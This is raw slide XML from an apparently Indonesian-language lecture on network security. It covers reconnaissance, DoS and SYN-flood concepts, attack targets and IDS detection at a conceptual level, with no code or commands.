              <a:t> ssh (secure shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ftp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> scp (secure copy), winscp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mendeteksi usaha</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>penyerangan dengan</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41988" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3667125"/>
            <a:ext cx="3038475"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Cari Informasi Tentang Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8458200" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Footprinting:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mencari company profile (dari sisi securitynya)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Scanning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>mencari “pintu” dan “jendela” yang terbuka</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Membuat tabel tentang target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Nomor IP, nama, alive?, services, jenis OS</a:t>
            </a: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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DoS Attack </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 5"/>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Pengertian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>(DoS Attack)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Serangan untuk melumpuhkan sistem yang dijadikan sebuah sasaran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Sering untuk serangan IPspoofing(seolah-olah datang dari tempat lain dengan no IP milik orang lain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Akibatnya:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Sistem yang diserang tidak dapat meyediakan layanan (denial of service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Yang diserang terjadi hang, crash, tidak berfungsi, kinerja turun,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Banyak terjadi kerugian finansial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Sasaran serangan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>DoS attack, menghabiskan bandwidth jaringan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Menghabiskan socket / connection / session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Menyerang SNMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Membuat paket palsu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Membajak (hijack) connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Computer / OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Masuk ke komputer (compromise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Membuat komputer hang (DoS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Aplikasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>web deface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>merusak database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en-US" smtClean="0"/>
              <a:t>Network DoS (SYN) Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="1447800"/>
            <a:ext cx="2362200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>Normal 3-way Handshake</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="1905000"/>
            <a:ext cx="2374900" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: PC Pengguna: “Hallo”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2362200"/>
            <a:ext cx="3960813" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>ACK-SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: Server: “Anda ingin berkomunikasi?”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46086" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2895600"/>
            <a:ext cx="2157413" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: PC Pengguna “Ya”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46087" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="3505200"/>
            <a:ext cx="1533525" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>DoS Handshake</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46088" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3962400"/>
            <a:ext cx="4303713" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: PC Pengguna mengirim “hallo” berulang-ulang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46089" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4876800"/>
            <a:ext cx="4954588" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>ACK-SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: Server merespons “Komunikasi?” berulang-ulang</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46090" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="5791200"/>
            <a:ext cx="5314950" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1"/>
              <a:t>No Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>: PC Pengguna menunggu sampai server “timeout”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46091" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2286000"/>
            <a:ext cx="992188" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Pengguna</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46092" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7142163" y="2286000"/>
            <a:ext cx="706437" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46093" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2209800"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46094" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3200400"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46095" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2286000" y="2667000"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46096" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3429000"/>
            <a:ext cx="7772400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46097" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="4343400"/>
            <a:ext cx="1295400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46098" name="Text Box 50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="968375" y="4648200"/>
            <a:ext cx="992188" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Pengguna</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46099" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7221538" y="4648200"/>
            <a:ext cx="706437" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46100" name="Line 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="4267200"/>
            <a:ext cx="4495800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46101" name="Line 53"/>
